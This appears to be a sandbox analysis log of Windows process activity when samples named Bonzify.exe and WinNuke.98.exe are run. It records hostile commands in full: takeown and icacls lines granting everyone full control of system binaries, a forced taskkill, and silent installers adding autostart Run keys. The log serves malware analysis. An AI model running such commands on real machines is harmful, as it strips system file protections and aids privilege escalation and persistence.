C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7348 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7376 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7632 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\WinNuke.98.exe"C:\Users\Admin\Downloads\WinNuke.98.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\Downloads\WinNuke.98.exe"C:\Users\Admin\Downloads\WinNuke.98.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Big Bang (1).rar"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Big Bang (1).rar"3⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04bb9eee-5fa0-431d-9d05-5107d256d980} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" gpu4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1da2ee1-634b-421a-85b9-e989e93c6801} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" socket4⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3448 -childID 1 -isForBrowser -prefsHandle 3440 -prefMapHandle 3436 -prefsLen 24741 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0a37ac0-9e7b-426c-b497-372087a0805d} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3700 -childID 2 -isForBrowser -prefsHandle 3696 -prefMapHandle 2744 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51f3320f-a6ca-4ef9-884a-6c6b0b0b3c27} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5220 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5212 -prefMapHandle 5204 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80146057-6b46-4c08-bd70-1f9ecc4dc412} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" utility4⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 3 -isForBrowser -prefsHandle 5468 -prefMapHandle 3572 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42c196d7-9967-4d4e-95c8-434ee1975265} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5640 -prefMapHandle 5648 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4c29fdc-fc0c-458c-9e7c-bac434193b2b} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5900 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5828 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a30b653e-150e-4cb5-8f36-50cc823789f0} 6100 "\\.\pipe\gecko-crash-server-pipe.6100" tab4⤵
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\Bonzify.exe"C:\Users\Admin\Downloads\Bonzify.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\KillAgent.bat"2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AgentSvr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exetakeown /r /d y /f C:\Windows\MsAgent3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\MsAgent /c /t /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..-personalizationcsp_31bf3856ad364e35_10.0.19041.746_none_1eeb97b23978a488\r\desktopimgdownldr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..-personalizationcsp_31bf3856ad364e35_10.0.19041.746_none_1eeb97b23978a488\r\desktopimgdownldr.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..-personalizationcsp_31bf3856ad364e35_10.0.19041.746_none_1eeb97b23978a488\r\desktopimgdownldr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exeINSTALLER.exe /q2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentCtl.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDPv.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\mslwvtts.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDP2.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentMPx.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentSR.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentPsh.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\msagent\AgentSvr.exe"C:\Windows\msagent\AgentSvr.exe" /regserver3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\f\WpcUapApp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\f\WpcUapApp.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\f\WpcUapApp.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\r\WpcUapApp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\r\WpcUapApp.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\r\WpcUapApp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\WpcUapApp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\WpcUapApp.exe"3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1266_none_1833f07ce0c90b68\WpcUapApp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1_none_595f2a7acaf53bba\WpcUapApp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1_none_595f2a7acaf53bba\WpcUapApp.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1_none_595f2a7acaf53bba\WpcUapApp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.19041.1_none_ad30f89d0263039b\pwlauncher.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.19041.1_none_ad30f89d0263039b\pwlauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.19041.1_none_ad30f89d0263039b\pwlauncher.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\f\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\f\printui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\f\printui.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exeINSTALLER.exe /q2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\printui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\r\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\r\printui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.1237_none_4b16fb7fab206eb1\r\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\f\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\f\printui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\f\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\printui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\r\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\r\printui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\r\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ioningsecureprocess_31bf3856ad364e35_10.0.19041.1_none_4cc7187cbf1ef970\psp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ioningsecureprocess_31bf3856ad364e35_10.0.19041.1_none_4cc7187cbf1ef970\psp.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ioningsecureprocess_31bf3856ad364e35_10.0.19041.1_none_4cc7187cbf1ef970\psp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\diskperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\diskperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\diskperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\logman.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\logman.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\logman.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\relog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\relog.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\relog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\tracerpt.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\tracerpt.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\tracerpt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\typeperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\typeperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.1_none_171488549e32a4d3\typeperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\diskperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\diskperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\diskperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\diskperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\diskperf.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\diskperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\logman.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\f\logman.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
